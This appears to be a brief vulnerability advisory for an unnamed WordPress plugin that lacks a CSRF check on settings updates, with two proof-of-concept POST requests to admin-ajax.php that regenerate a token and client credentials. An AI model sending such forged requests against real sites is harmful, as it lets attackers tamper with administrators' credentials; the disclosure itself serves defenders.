The plugin does not have Cross-Site Request Forgery (CSRF) check in place when updating its settings, which could allow attackers to make a logged in admin change them via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

Regenerate Token exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=regenerate_token

Regenerate Client Credentials exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=regenerate_client_credentials